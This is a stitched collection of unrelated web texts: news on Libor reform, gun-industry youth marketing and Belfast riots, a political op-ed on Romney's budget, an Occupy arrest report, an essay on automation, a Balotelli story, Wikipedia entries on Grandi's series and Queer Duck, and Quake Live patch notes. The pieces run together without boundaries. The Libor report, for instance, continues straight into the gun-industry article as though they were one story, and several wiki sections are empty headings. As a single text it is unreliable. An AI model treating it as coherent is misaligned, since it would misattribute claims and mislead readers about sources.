LONDON — British authorities are set to announce significant changes to the interest rate at the heart of a recent manipulation scandal as they aim to improve the accuracy and reliability of the benchmark.
On Friday, Martin Wheatley, the managing director of Britain's Financial Services Authority, will outline plans to increase oversight of the rate-setting process, which underpins more than $350 trillion of financial products like mortgages and student loans.
As part of that effort, regulators are stripping the British banking group that currently oversees the interest rate — the London interbank offered rate, or Libor — of its power. The British government, in turn, will take a more hands-on role, including making rate manipulation a criminal offense.
The benchmark itself will also be retooled to address some of its inherent weaknesses. The goal is to base Libor, which measures the rate at which banks lend to each other, on actual market transactions, rather than estimates.
“The disturbing events we have uncovered in the manipulation of Libor have severely damaged our confidence and our trust,” Mr. Wheatley says in an advance text of the remarks he is to deliver in London. “It has torn the very fabric that our financial system is built on.”
Libor Explained
The scrutiny of Libor has intensified this year as authorities around the globe have ramped up their investigation into rate-rigging at more than a dozen big banks. Regulators are concerned that the institutions, including HSBC, Deutsche Bank and JPMorgan Chase, submitted false rates.
In June, the British bank Barclays agreed to pay $450 million to settle charges that employees manipulated the rate to increase profits and make the institution appear healthier. Several top officials, including the chief executive, Robert E. Diamond Jr., resigned as a result of the scandal.
“Libor needs to reflect the values of the market,” said David E. Kovel, a partner at the law firm Kirby McInerney who is representing clients in a potential class-action suit related to Libor. “There's no doubt the way that the rate is set up now makes it susceptible to abuse.”
The changes to Libor, some of which may require changes to British law, are expected to be introduced over the next 12 months.
The Financial Conduct Authority, a new British regulator that will become part of the Bank of England, the country's central bank, will have primary responsibility for regulating Libor. Mr. Wheatley of the Financial Services Authority will lead the new agency when it is created next year.
“We can't allow the unfettered latitude that banks previously enjoyed,” Mr. Wheatley's advance text says. “Much greater rigor and transparency must be introduced.”
Under the proposal, regulators will pare back the number of currencies and maturities included in the Libor system. Critics have questioned the accuracy of Libor, given the lack of actual bank lending transactions, particularly in smaller currencies like the Swedish krona.
To improve the system, five of the current 10 currencies, including the Canadian dollar, will be phased out over the next year. Instead, Libor will focus mainly on major currencies like the United States dollar and the euro. In all, regulators are looking to cut the number of Libor rates to 20, from 150.
Individual banks' rate submissions will be delayed by three months, rather than released in real time. This change means Libor will not readily reflect a bank's health, potentially eliminating a motivation to submit false rates.
If a bank reports a high rate, it can be a sign of underlying troubles at the firm. During the financial crisis, Barclays submitted artificially low rates to deflect concerns about its financial position, according to regulatory documents.
Despite the changes, analysts worry that Libor may still be easy to manipulate. Since the financial crisis, banks have not been willing to take the risk of lending to other institutions. In their proposal, regulators indicate that the process will still rely on some “level of judgment” when hard data are not available.
“There are few markets where there's a significant amount of liquidity,” said Darrell Duffie, a finance professor at Stanford University. “It makes sense to prune down the number of maturities.”
The British government will also replace the British Bankers' Association, the London-based trade group, as Libor's overseer. The organization, which established the benchmark rate in 1986, has come under mounting criticism for failing to catch the manipulation, which dated back to at least 2007, according to regulatory filings.
Under the proposed changes, a new administrator will be selected in the next 12 months. The future role of the data provider Thomson Reuters, which currently collects the daily rate submissions on behalf of the trade association, is uncertain.
“British Bankers' Association clearly failed to properly oversee the Libor setting process and should take no further role in the administration and governance of Libor,” Mr. Wheatley's advance text says.
He will also take aim at the excesses within the financial services sector that led to the manipulation of Libor, arguing that traders at many of the world's largest banks were too focused on securing large bonuses. “Libor needs to get back to doing what it is supposed to do,” the text says, “rather than what unscrupulous traders and individuals in banks wanted it to do.”
Trying to Reverse a Trend
The shooting sports foundation, the tax-exempt trade association for the gun industry, is a driving force behind many of the newest youth initiatives. Its national headquarters is in Newtown, just a few miles from Sandy Hook Elementary School, where Adam Lanza, 20, used his mother's Bushmaster AR-15 to kill 20 children and 6 adults last month.
The foundation's $26 million budget is financed mostly by gun companies, associated businesses and the foundation's SHOT Show, the industry's annual trade show, according to its latest tax return.
Although shooting sports and gun sales have enjoyed a rebound recently, the long-term demographics are not favorable, as urbanization, the growth of indoor pursuits like video games and changing cultural mores erode consumer interest. Licensed hunters fell from 7 percent of the population in 1975 to fewer than 5 percent in 2005, according to federal data. Galvanized by the declining share, the industry redoubled its efforts to reverse the trend about five years ago.
The focus on young people has been accompanied by foundation-sponsored research examining popular attitudes toward hunting and shooting. Some of the studies used focus groups and telephone surveys of teenagers to explore their feelings about guns and people who use them, and offered strategies for generating a greater acceptance of firearms.
Image A promotional video featuring Larry Potterfield, the founder of one of the nation's largest sellers of shooting supplies, on the Web site of the Scholastic Shooting Trust Fund.
The Times reviewed more than a thousand pages of these studies, obtained from gun industry Web sites and online archives, some of them produced as recently as last year. Most were prepared by consultants retained by the foundation, and at least one was financed with a grant from the United States Fish and Wildlife Service.
In an interview, Mr. Sanetti said the youth-centered research was driven by the inevitable “tension” the industry faces, given that no one under 18 can buy a rifle or a shotgun from a licensed dealer or even possess a handgun under most circumstances. That means looking for creative and appropriate ways to introduce children to shooting sports.
“There's nothing alarmist or sinister about it,” Mr. Sanetti said. “It's realistic.”
Pointing to the need to “start them young,” one study concluded that “stakeholders such as managers and manufacturers should target programs toward youth 12 years old and younger.”
In mathematics, the infinite series 1 − 1 + 1 − 1 + ⋯ {\displaystyle 1-1+1-1+\dotsb } , also written
∑ n = 0 ∞ ( − 1 ) n {\displaystyle \sum _{n=0}^{\infty }(-1)^{n}}
is sometimes called Grandi's series, after Italian mathematician, philosopher, and priest Guido Grandi, who gave a memorable treatment of the series in 1703. It is a divergent series, meaning that it lacks a sum in the usual sense. On the other hand, its Cesàro sum is 1/2.
Unrigorous methods [ edit ]
One obvious method to attack the series
1 − 1 + 1 − 1 + 1 − 1 + 1 − 1 + ...
is to treat it like a telescoping series and perform the subtractions in place:
(1 − 1) + (1 − 1) + (1 − 1) + ... = 0 + 0 + 0 + ... = 0.
On the other hand, a similar bracketing procedure leads to the apparently contradictory result
1 + (−1 + 1) + (−1 + 1) + (−1 + 1) + ... = 1 + 0 + 0 + 0 + ... = 1.
Thus, by applying parentheses to Grandi's series in different ways, one can obtain either 0 or 1 as a "value". (Variations of this idea, called the Eilenberg–Mazur swindle, are sometimes used in knot theory and algebra.)
Treating Grandi's series as a divergent geometric series and using the same algebraic methods that evaluate convergent geometric series to obtain a third value:
S = 1 − 1 + 1 − 1 + ..., so 1 − S = 1 − (1 − 1 + 1 − 1 + ...) = 1 − 1 + 1 − 1 + ... = S 1 − S = S 1 = 2S,
resulting in S = 1/2. The same conclusion results from calculating −S, subtracting the result from S, and solving 2S = 1.[1]
The above manipulations do not consider what the sum of a series actually means and how said algebraic methods can be applied to divergent geometric series. Still, to the extent that it is important to be able to bracket series at will, and that it is more important to be able to perform arithmetic with them, one can arrive at two conclusions:
The series 1 − 1 + 1 − 1 + ... has no sum. [1] [2]
...but its sum should be 1/2.[2]
In fact, both of these statements can be made precise and formally proven, but only using well-defined mathematical concepts that arose in the 19th century. After the late 17th-century introduction of calculus in Europe, but before the advent of modern rigor, the tension between these answers fueled what has been characterized as an "endless" and "violent" dispute between mathematicians.[3][4]
The formula for the sum to infinity of a geometric series is a 1 − r {\displaystyle {\frac {a}{1-r}}} , although the derivation for the sum is only valid when | r | < 1 {\displaystyle |r|<1} (as with the modulus of r less than one then the terms of the series will decay to zero as n increases and the series will converge). In the case of G = 1 − 1 + 1 − 1 + ⋯ {\displaystyle G=1-1+1-1+\cdots } with a = 1 {\displaystyle a=1} and r = − 1 {\displaystyle r=-1} , the above formula would equate to a 1 − r = 1 1 − ( − 1 ) = 1 2 {\displaystyle {\frac {a}{1-r}}={\frac {1}{1-(-1)}}={\frac {1}{2}}} but since the series does not converge it is misleading to speak of its "sum".
Early ideas [ edit ]
Divergence [ edit ]
In modern mathematics, the sum of an infinite series is defined to be the limit of the sequence of its partial sums, if it exists. The sequence of partial sums of Grandi's series is 1, 0, 1, 0, ..., which clearly does not approach any number (although it does have two accumulation points at 0 and 1). Therefore, Grandi's series is divergent.
It can be shown that it is not valid to perform many seemingly innocuous operations on a series, such as reordering individual terms, unless the series is absolutely convergent. Otherwise these operations can alter the result of summation.[5] Further, the terms of Grandi's series can be rearranged to have its accumulation points at any interval of two or more consecutive integer numbers, not only 0 or 1. For instance, the series
1 + 1 + 1 + 1 + 1 − 1 − 1 + 1 + 1 − 1 − 1 + 1 + 1 − 1 − 1 + 1 + 1 − ⋯ {\displaystyle 1+1+1+1+1-1-1+1+1-1-1+1+1-1-1+1+1-\cdots }
(in which, after five initial +1 terms, the terms alternate in pairs of +1 and −1 terms) is a permutation of Grandi's series in which each value in the rearranged series corresponds to a value that is at most four positions away from it in the original series; its accumulation points are 3, 4, and 5.
Education [ edit ]
Summability [ edit ]
Related problems [ edit ]
See also [ edit ]
Notes [ edit ]
Media playback is unsupported on your device Media caption CCTV footage shows rioters pushing a burning car towards police lines
Police have released video footage of rioters turning a hijacked car into a moving fireball to attack police during disturbances in Northern Ireland.
The rioters pushed the blazing car towards police lines in the Ardoyne area of north Belfast on 12 July.
Dozens of people were forced to run out of the way as the burning car crashed into a garden.
Police said if the petrol tank in the car had exploded, there would have been multiple deaths.
After the car crashed, rioters tried to push it back towards the police even though the vehicle was still on fire.
Sixteen police officers were injured during the second consecutive night of rioting in the area.
The trouble broke out after police in riot gear took up position ahead of an Orange Order parade walking past shops in the Ardoyne area.
On the Twelfth of July, the Protestant Orange Order takes part in demonstrations across Northern Ireland, commemorating King William III's 1690 Battle of the Boyne victory over Catholic King James II.
Releasing the footage at a press conference on Tuesday, police appealed for more information about those involved in the violence.
Detective Chief Inspector Alan Little said the public could show their opposition to the rioters by coming forward.
He said he was dealing with similar scenes of violence at several locations across Belfast over the Twelfth period including the Broadway, North Queen Street and Oldpark Road areas.
"We all need to work together to isolate these individuals and stop them from ruining the lives of those who live in any areas affected by violence like this," he said.
"There are members of the public who know who the people involved are.
Convictions
"Whilst we have had an excellent response so far, I want to take this opportunity to appeal to anyone else who can help my inquiry.
"By coming forward with information, members of the local communities can send out the message to these people that they do not want the sort of behaviour that was on display."
Mr Little is heading up a team of 14 officers dedicated to investigating the trouble.
He said an intensive investigation following last year's disorder over the Twelfth period had led to 40 convictions.
"This year, I again intend to have a professional, robust and extensive inquiry," he added.
"Having gone through dozens of hours of video coverage we already have evidence relating to numerous extremely serious offences such as hijacking, petrol bombing and sustained, determined rioting.
"We will be gathering, examining and acting upon all the available evidence to construct a professional investigation that will bring those involved before the court."
Mr Little also rejected claims by Sinn Fein assembly member Gerry Kelly that the police were "pro-active" in arresting people in nationalist areas following recent trouble but had taken a "hands-off approach" in loyalist areas.
He said there had been a comparable number of arrests after the disturbances in east Belfast last month to those which followed the disorder in Ardoyne.
Mitt Romney is a very wealthy man with a proven capacity for avoiding taxes – but can he do simple arithmetic?
In the wake of the Democratic convention, the Republican candidate again promised to “cut the deficit and get us back on track to a balanced budget.” He even hinted that his own party bears some responsibility for ballooning federal deficits and debt. “We're going to finally have to do something that Republicans have spoken about for a long time and for a while we didn't do it. When we had the lead, we let people down,” he said the other day, presumably referring to the last Republican president, whose name must never be mentioned, and the Congressional leadership during that administration.
And “for a while” presumably refers to the past 30 years or so.
Romney also says that he watched none of the speeches at the Democratic convention. He obviously missed the one that might have helped him figure out exactly what his party has been doing wrong. “I hear Bill Clinton spoke for like, 50 minutes?” he snarked at a public appearance on Friday. Yes, the former president spoke for just over 49 minutes – and he articulated a message that could enlighten Romney. Clinton's lesson might be titled “Arithmetic for Billionaires.” He could start with an accurate assessment of the origins of the national debt level currently carried by the U.S. Treasury. As Clinton noted, the federal debt roughly quadrupled during the 12 years of the Reagan-Bush administration, from just under a trillion dollars to four trillion.
When Clinton became president, that debt was rising rapidly with annual deficits of $400 billion. His first budget raised taxes, almost entirely on the wealthiest taxpayers, by restoring a top bracket of 39.5 percent. Not a single Republican in Congress voted for that 1993 budget, with many of them predicting that raising taxes on the rich would result in economic catastrophe. They were wrong, of course.
The economy boomed, incomes rose at every level, millions began to climb out of poverty, and the rich became richer too (although many of them never forgave Clinton for demanding that they pay up for the festivities of the Reagan era). Clinton booked four balanced budgets and began to pay down the national debt. The debt would have been paid down entirely, preparing the nation far better for the crash that we ultimately faced, had that unnamed Republican not succeeded Clinton with reckless tax cuts and extremely expensive wars.
By the time President Nameless left office, the nation was deeply in debt and on the brink of a catastrophe that wasn't merely rhetorical. Now along comes Romney, with his sidekick Paul Ryan, telling voters that they will cut the deficit and balance the budget. Yet as Clinton noted, they propose still another round of tax cuts for the wealthiest households – including their own and those of their most generous supporters – that would cost the Treasury at least $5 trillion. And they insist on increasing the defense budget by hundreds of billions, too.
What Clinton asked is how the Republican nominees propose to pay for those lavish favors to themselves and their friends. Doing the arithmetic himself, he came up with three possible answers: They will raise taxes on the middle class by taking away mortgage, charitable and other deductions, so that billionaires can have another tax break. They will cut federal spending so deeply that infrastructure, education, science, technology, and health care will be ruined for the future. Or they will do nothing, and explode the debt, just as their predecessors have done repeatedly over the past three decades.
Whether in their own 40-minute addresses to their party convention or elsewhere, neither Romney nor Ryan has offered a plausible solution to Clinton's arithmetic problem. They talk about spending cuts and tax reform, but without any specifics. The footnote to their budget claim says only, as Clinton put it: “See me about that after the election.” Clearly the Republicans intend to push off difficult questions about their budgeting, just as Romney intends to push through without releasing his tax returns. But those evasions may prove very difficult to sustain through the four upcoming debates.
Sometime before November 6, someone will ask Romney and Ryan to do the arithmetic.
Photo credit: AP/Evan Vucci
Around 2:30 p.m. on Saturday, the Occupy Wall Street Livestream captured about 20 people being arrested outside a Citibank at La Guardia Place in New York. A protester announced via human mic that people had gone inside Citibank to close their accounts. They were asked to leave and complied, he said, but the bank's security guards locked them in until the N.Y.P.D. arrived.
“Some wanted to close their accounts with Citibank,” he read from a cell phone. “When asked to leave, they began to exit but were locked in by security. When cops arrived, Citibank security came outside and dragged two individuals back inside to hold them under arrest.”
The protesters were loaded into the back of a police van as the crowd shouted, “Let them go! Let them go!” as 10,000-some people watched the scene on Livestream. “Liberate the unlawfully arrested!” one man shouted.
Citibank CEO Vikram Pandit, who was on a list of tycoons the protesters identified for a home visit last week, recently said he'd be happy to talk to protesters if they'd like to come by the office. Their sentiments are “completely understandable,” he said at a recent breakfast hosted by Fortune.
Video was taken by a witness, Logan Price:
By now accustomed to such interruptions, the protesters continued their march after the arrests with the customary chants. “The people, united, will never be defeated,” and so on. “OBVIOUSLY THEY NEED TO GO BACK AND RESCUE THE PEOPLE IN THE TRUCK!!!” one viewer said in the Livestream chatroom.
OccupyWallSt.org says 22 arrested, as of 3:43 p.m. Other protesters marched from Zuccotti Park, the protest's headquarters in the Financial District, to the Citibank at 555 La Guardia Place in solidarity with the arrestees, the website said.
Update, 5:04 p.m. Another video, uploaded to the #OccupyWallStreet TwitVid account, more clearly shows a woman being arrested after telling the police that she was a Citibank customer.
Why I Think a Robot Should Take My Job
I clock-in every day to do the work of machines. There's a good chance you might, too.
Jordan Stephens Blocked Unblock Follow Apr 19, 2016
I'm a phlebotomist by trade. I work forty hours every week in a private clinic drawing blood, processing it according to a physician's order, and sending it to a laboratory for testing. It's not exactly fulfilling in any existential sense and certainly not a field in which I'd honor my life's work in twenty years, but for now, it pays the bills. That's what I'd like to talk about.
American innovative genius, Richard Buckminster Fuller, once said,
“We should do away with the absolutely specious notion that everybody has to earn a living. It is a fact today that one in ten thousand of us can make a technological breakthrough capable of supporting all the rest. The youth of today are absolutely right in recognizing this nonsense of earning a living. We keep inventing jobs because of this false idea that everybody has to be employed at some kind of drudgery because, according to Malthusian Darwinian theory he must justify his right to exist. So we have inspectors of inspectors and people making instruments for inspectors to inspect inspectors. The true business of people should be to go back to school and think about whatever it was they were thinking about before somebody came along and told them they had to earn a living.”
What strikes me most about this “radical idea” is that he died in 1983.
Unless you're able to make your ends meet writing Medium articles all day, you may be able to algorithmically deduce the proper actions of your work routine according to real-time circumstances presented at any given moment. If this is the case, then your job can and should be done by a computer. If that makes your butt cheeks clinch a bit much for comfort, allow me to explain why this is good news.
It's the natural progression of things.
The robot revolution is nothing new. The difference is they're much more advanced and tend to appear flashier than before — that's it. One accountant can now perform enormous data collection and complex calculations nearly instantaneously and without error which may have taken hours for hundreds of mathematicians to accomplish only a hundred years ago. Think of your washing machine, your dishwasher, the list goes on. Use of tools and technology predates even the Homo sapiens species, gradually replacing sentient labor all along the way. It seems a bit silly these days to mourn the loss of the classic switchboard operator from the ‘60's, and, from this perspective, it seems only natural for machines to assume their rightful places in history as restaurant waiters, drivers, construction workers… You get the idea.
We want computers doing the tasks in which we expect a distinct and predictable outcome. Not only would they probably perform the task without error but would likely increase speed of performance or production and accomplish all this for a fraction of the cost without a unionized backlash.
Think we, not me.
Now for the glaringly obvious question: what about my income? This is a very important question — one in which we struggle with every technological advancement replacing the work of a person, and one in which we must prepare to tackle on the largest scale in history. We're already behind in productivity and technological potential for this very reason, and its integration into society is an inevitability, not a possibility. So, if you have a rote job, like me, one should not be asking if, but rather when will technology supersede my own value of contribution to society.
The solution, from an objective point of view, is simple: we must rethink the economy and structure it in a way which provides for its citizens, insofar as it allows its citizens to benefit society to their maximum potential. Why haven't we accomplished this yet?
We are so inseperably adhered to the subjective viewpoint of ‘how can I make my living' that it becomes irrelevant to ask, instead, ‘how can we, as a society, live better.'
This is especially true in America, home of the Grand Ole Party determined to shove its “freeloaders” further into poverty from which they already can't escape. We are obsessed with the idea that for some reason anyone who doesn't perform x-amount of mundane tasks per week doesn't deserve to survive with any shred of decency, when the reality is that we'd all be much better off if we simply poured as much effort into maximizing productivity of our machines as we do force others to work jobs much better suited to those machines.
“But, I like to cook.” : (
Is it weird to say that I'd actually miss phlebotomy? There are facets of my job I genuinely enjoy, such as patient interaction, and I have more good news: none of it has to go away! If you don't believe me, head over to Venice and take a ride on a gondola. The once practical means of transportation around the city is now a tourist novelty, and everyone participates really wants to be there. My point is that no longer relying on mundane jobs as a necessary means of survival alleviates pressure from pursuing life's pleasures without worry of your likelihood to profit from it.
Yes, there are many details to sort out.
How do we motivate and reward workers of those jobs which we cannot yet fully automate? How do we fairly allocate limited resources in balance with certain markets' supply and demand? How do we most effectively transition from the survivalist economy to the prosperous economy? We could spend hours on each of these questions which would, in turn, spur hundreds more, which is why we won't dwell on any more specifics here; however, I do believe we can find succinct solutions.
If you'd like a vague and short answer,
Keep in mind that we do not necessarily have to eliminate economy, but rather allow the economy to work for the people instead of the people working for the economy by responsibly maintaining our resources, eliminating scarcity, and increasing productivity.
Transition is hard. Continuing along a trajectory which widens the gap between the rich and the poor and trashes our resources and environment is also hard, and considering we, as a society, have a lot of hard decisions to make in the near future, this is why I'd rather a robot take my job — so that I may have the freedom to improve upon the concise and algorithmic processes which comprise the science of phlebotomy rather than repeating an imperfected process several times a week. So that my human dignity is affirmed not by my ability to do mundane tasks, but by my freedom to contribute to society in a greater capacity than what can be achieved by machines. So that I can travel, laugh, and fulfill my one little life on this Earth to its greatest potential. That's what we owe each other, and that's what we should expect of one another.
Mario Balotelli faces a hefty bill to repair his rented home that was damaged last month in a fireworks incident. The owner of the £3 million ($4.8 million) mansion wants the Manchester City star to pay for the repairs, according to the Daily Mail.
“Manchester City's eccentric striker has had a rocket from his landlord,” the report says, “who wants Balotelli to pay himself for the damages rather than go through insurance. Balotelli's four-bedroom house suffered smoke damage and the bathroom was gutted in the fire, caused by a friend letting off the firework.”
Balotelli claims a friend of his brother tried to launch a firework out of a bathroom window, but it all went wrong. The 21-year-old could be hit with a £400,000 ($644,000) bill to cover the damage.
The incident took place the day before the Oct. 23, Manchester derby that saw City beat United 6-2 at Old Trafford. The Italian striker scored twice and propelled his team to the top of the English Premier League.
After an indifferent first season in English soccer, Balotelli has been a top performer this year. He's bagged seven goals in 10 games for City and scored his first goal for Italy's national team in Friday's 2-0 win over Poland.
Queer Duck is an American animated series produced by Icebox.com that originally appeared on Icebox.com and later moved to the American cable television channel Showtime in 2000, where it aired as a follow-up feature of the American version of Queer as Folk. Although far from being the first gay cartoon character, Queer Duck was the first animated TV series to have homosexuality as its predominant theme. Like several later television cartoons, Queer Duck was animated in Macromedia Flash.
The show was created, written and executive-produced by Mike Reiss, executive producer of network cartoons The Simpsons and The Critic. The animation was directed and designed by Xeth Feinberg. The theme song for the cartoon was performed by the drag queen celebrity RuPaul.
Despite the suggestive content, there is no graphic language or any sexual content, but the latter is heavily implied throughout the series and the movie.
Characters [ edit ]
Queer Duck [ edit ]
The title character, whose full name is Adam Seymour Duckstein (voiced by Jim J. Bullock), is a gay anthropomorphic duck who works as a nurse. In an interview included on the DVD release of Queer Duck: The Movie Reiss states that Bullock is the only member of the cast that is actually gay, and that he had insisted that the character be voiced by someone gay.
Queer Duck has cyan-colored feathers, a little spiky fringe, and may wear purple eye shadow. He wears a sleeveless rainbow top and, like almost everyone else in the series, does not wear trousers. This follows the tradition of semi-nudity of cartoon animals exemplified by Porky Pig, Donald Duck, Top Cat, etc. He is often shown to have two fingers and one thumb on each hand, though on occasion he has the three fingers and one thumb per hand that is typical of many contemporary cartoons.
Queer Duck is known to gossip about anything and everything, especially on the phone while watching television, as shown on Oh Christ!, The Gaining of Herpes from Sparky and A Gay Outing. He is promiscuous in his own way, but not as obsessed with sex as his boyfriend Openly Gator; for example, he'll often utter the word "cock" but swiftly follows it with another word, like "tails", such as in The Gay Road to Morocco.
His nemesis is known to be radio show host Laura Schlessinger, who is pictured as a haggard and ugly old woman.
Queer Duck has also been a victim of gay bashing, as shown in Ku Klux Klan & Ollie, in which Ku Klux Klan members attempt to burn his house down. When his disguise fails, he kisses the unveiled Jerry Falwell, only to get shot down by the other homophobes. When in heaven he finds out that famous icons like Socrates and Leonardo da Vinci are also gay, much to the chagrin of Jerry Falwell.
Over the course of the series, the audience learns that Queer Duck has a Jewish mother who is in denial of his sexuality, a diabetic father (whose name is revealed to be Morty in the episode Quack Doctor), a straight brother named Lucky (who is shown to have bullied Queer Duck when they were younger), a nephew named Little Lucky and a lesbian sister named Melissa. Queer Duck is not the most beloved child in his family and there are strong hints that his older brother Lucky is the most favored one, due to his heterosexuality.
Queer Duck is afraid to show his sexuality to his nephew Little Lucky (who first appeared in Fiddler on the Roofie), especially while camping with two of Little Lucky's friends. They discovered one of his magazines, which included personal ads that contained acronyms like GBM, S&M and B&D. Lucky, however, is already aware of his uncle's sexual identity: when his fellow campers taunt him by saying, "Your uncle is gay", Lucky answers, "Well, DUH!".
Other characters [ edit ]
Recurring supporting characters include Queer Duck's mother (played by Estelle Harris, George's mother on Seinfeld) and the group's nemesis, Dr. Laura Schlessinger (played by voice actress Tress MacNeille). One character, a large, well-built horse, portrays different characters in each episode. He starts out as a gay-converting Christian minister but later portrays more gay-sensitive characters, such as a flight attendant on TWGay. Other characters who have appeared include Truman Coyote, Ricky Marlin and KY Jellyfish.
Recurring themes [ edit ]
Although each three-minute episode stands by itself, there are several recurring themes throughout the 20-episode series, such as coming out, gay relationships/marriages, and the problems that can arise when gay and lesbian people have to interact with their straight family members. These are explored through a variety of situations: Queer Duck comes out to his parents in the first episode; in another, Queer Duck and Openly Gator get married, and it's revealed that Queer Duck has a lesbian sister; and in other episodes, Queer Duck must deal with other family members, such as his straight brother, who is much beloved by their parents.
Much like The Critic, Queer Duck features numerous "cameo" voice appearances by celebrities, these voices are impersonated by the cast. In addition to Dr. Laura, the Queer Duck gang encounter Bob Hope, Jack Nicholson, Cary Grant, and Barbra Streisand, with whom Queer Duck is obsessed, as well as noted ultra-conservative preacher Jerry Falwell. These celebrities are the only human characters. All other characters are anthropomorphic animals like Queer Duck and his friends, except for the woman Queer Duck sleeps with in the final episode.
Episodes [ edit ]
Legacy [ edit ]
In 2005, Queer Duck was voted among the 100 Greatest Cartoons in a poll conducted by the British television channel Channel 4, ranking at #94. In 2011, Queer Duck returned to introduce the 31st Jewish San Francisco Film Festival.[1]
Cancellation [ edit ]
The show ended because Showtime decided not to air any more LGBT programming[citation needed] and removed it from the website, despite still keeping Queer as Folk intact. That is why the movie was made by icebox.com and produced for DVD release.
Film [ edit ]
Queer Duck: The Movie, an all-new feature film based on the animated series, was released on DVD July 18, 2006. The film reunites the original creators and cast of Queer Duck, plus special guest stars Conan O'Brien as himself, Tim Curry as Peccery the butler, Jeff Glen Bennett as the main antagonist; a homophobic bigoted priest named Reverend Vandergelding, Mark Hamill as a hot dog vendor, Bruce Vilanch as himself, Andy Dick as former drag queen Rex (formerly Regina), Jackie Hoffman as Broadway actress Lola Buzzard, April Winchell doing additional voices and David Duchovny as "Tiny Jesus".[2] Gay-themed channel Logo premiered the film on July 16. The film focuses on Queer Duck struggling with his sexuality and love crisis between his longtime partner Openly Gator or the spunky Broadway actress Lola Buzzard.
Infinity (CTF) by Ferdinand ‘cityy' List - website, video
After the hazardous materials make their way through the facilities in Reflux, the water-based byproducts end up here in Infinity. This Capture the Flag arena was converted from its industrial uses after being abandoned years ago by the original owners. Long lines of sight down the center create opportunities to rail outgoing flag runners, who may choose to take a dip into the slower, but safer, water paths. A Quad Damage spawns in the middle every two minutes, so coordinate your attacks wisely!
Limbus (TDM) by Mike ‘Yellack' Schreiber and Gary ‘akm' turner - video
A Team Deathmatch arena made by the team of Yellack and akm, Limbus also plays great in our Domination mode. The Quad Damage room offers interesting possibilities for fights, offering a route that requires some dexterity while jumping across high, exposed platforms. Don't forget about the underground areas; Limbus is larger than it appears on first inspection.
Silence (Duel) by Ferdinand ‘cityy' List - website
A Duel arena that has you surrounded by—thankfully contained — corrosive material, the action in Silence is anything but. Silence is pretty tall as far as Duel arenas go, so you'll have to be aware of your vertical surroundings. The Red Armor is placed for maximum grab-and-run potential, but you may want to keep an eye out for Railgun-toting opponents before you leap. Silence is a great addition to the Duel arena pool, and is also fun for small Free for All and Clan Arena matches.
Terminus (TDM) by FRS and Gary ‘akm' turner - video
Taking place in a sprawling base, Terminus is a very large Team Deathmatch arena with lots of room for tricks and advanced movement. Teams will vie for control for the Battle Suit and Quad Damage rooms, taking care to not get knocked into the fog, or knocked off the Quad platform, making any player who drops down easy fragbait. Terminus is also available for Domination play.
Windsong Keep (Duel) by Tom ‘Phantazm11' Perryman - website, Q3 version on LvL
The author of Black Cathedral is back with a third arena: a Duel arena taking place in a stunning castle. Windsong Keep is nothing short of an artistic masterpiece in the QUAKE LIVE engine. Expect heavy combat around the ruined tower which holds the Red Armor. A Mega Health is located in another central room, but with ample room for ambush. Try not to get distracted by the beautiful visuals while running through the hallways. Windsong Keep definitely plays as well as it looks.
m16 on the new maps, without TDM maps
Post-Match Arena Voting: Voting for the next arena is now done during the end game scoreboard. You are able to switch your votes as many times as you want, every 2.5 seconds. Selecting an arena will mark you as ready, and the time spent at the scoreboard is now a fixed time.
Start a Match Presets: A Preset Manager is now available under Advanced Settings: give your presets a name, and store your favorite Start a Match setting locally. Loading presets can be done in as little as two clicks. If you're not sure what preset to choose, preview the changes before loading them!
New Match Management Options: Three requested options have been added to Match Management: Inactivity Kick Length to enable the idle kick seen on public matches, Enable Automatic Shuffle which will automatically shuffle teams when enough players are in warmup, and Shuffle Behavior to allow changing shuffles from default Skill Based option to Random. Server owners are automatically excluded from being kicked due to inactivity.
Clan Search: Search through all current clans by clan tag, or by clan name. Click on search results to view the clan's profile page.
Arena Statistics Graph: A pie graph of the player's top 15 arenas, sorted by games played, is available for Premium users on the Arenas tab.
* Resolved several instances where certain characters in clan names would cause the names to not be rendered correctly.
* Resolved an issue where a user could have a Premium-level arena in a Standard-level match, resulting in an error when starting the match.
* Resolved an issue where player models were not rendering properly in the Friend Earned Award popup.
* Resolved an issue where certain characters in match names were not being decoded correctly.
* Scoreboard will no longer count players that haven't fired a weapon in the team accuracy totals.
* Resolved an issue that may cause accuracy values on the scoreboard to be incorrect if you rejoined a match in progress.
* Server owners can no longer be callvote kicked from their own matches.
* Resolved an issue where votes could be called after a previous vote has already passed, but before the vote action was taken.
* Domination point captured/loss VO will only be played if cg_playTeamVO is enabled.
* Resolved an issue where Railgun rails would predict firing while chatting.
* Callvote menu is updated properly when “callvote map” is disabled.
* Item heights are now taller in PQL. Like flags, items cannot be easily jumped over.
* Added the ability to hold crouch at the top of jumppads to catch the ledge, instead of either a normal drop or a rampjump.
* Increased vertical knockback for more vertical popup from splash damage, without breaking self-splash or rocket jumps.
* Increase Plasma Gun splash radius from 20 to 32
* Increase Plasma Gun knockback from 1.10 to 1.25
* Increase Rocket Launcher knockback from 1.00 to 1.10
* Increase maximum knockback from 120 to 160
* Swim speed increased from 160ups to 190ups.
Bloodlust: Fixed blue's offset flagbase.
Devilish: The Quad Damage no longer spawns in Duel.
Hidden Fortress: Fixed clipping in curve near 50hp and teleporter.
Reflux: The Red Armor respawn time has been increased from 25 to 60 seconds.
Reflux: Optimizations for performance, including the portals in base have been changed to teleporters (cannot see through them).
Stonekeep: The Red Armor respawn time has been increased from 25 to 60 seconds.
Toxicity: Optimizations for performance.
Start date: July 24, 2012
End date: Sept 2, 2012
Beyond Reality
Bloodlust
Campgrounds
Chemical Reaction
Dreadful Place
Fallout Bunker
Furious Heights
Industrial Accident
Japanese Castles
Overkill
Quarantine
Realm of Steel Rats
Revolver
Sacellum
Solid
Somewhat Damaged
Space Chamber
Space CTF
Spider Crossings
Stonekeep
Wargrounds
We're pleased to announce the release of QUAKE LIVE Premium Pak 13. This release contains five new arenas from popular community authors, new player character skins, and a change to our Premium subscription model. Starting today, we will be regularly cycling the Standard arena pool. On the first Monday of each month, 21 arenas will be selected as playable for Standard-level matches. Newly released arenas will remain exclusive for at least three months, but every other arena is eligible to be included in the cycle.In addition to this change, we are also introducing a new arena voting system to increase the variety of arenas played. Players playing on Standard-level matches will now have a choice between three arenas at the end of each match. The arena voted on will be the next match played. Premium matches will continue to have access to the entire arena pool, and matches created by our Pro players will continue to have the option to change arenas at any point.Rounding out this update are new "Bright" and "Sport" skin variations for every model on the roster, to allow players to be any character in the game, but still remain highly visible. We also have a few updates to our new Start a Match to help manage matches. We've seen a tremendous increase in Start a Match activity in recent months, and we love seeing what modifications our players have come up with so far! 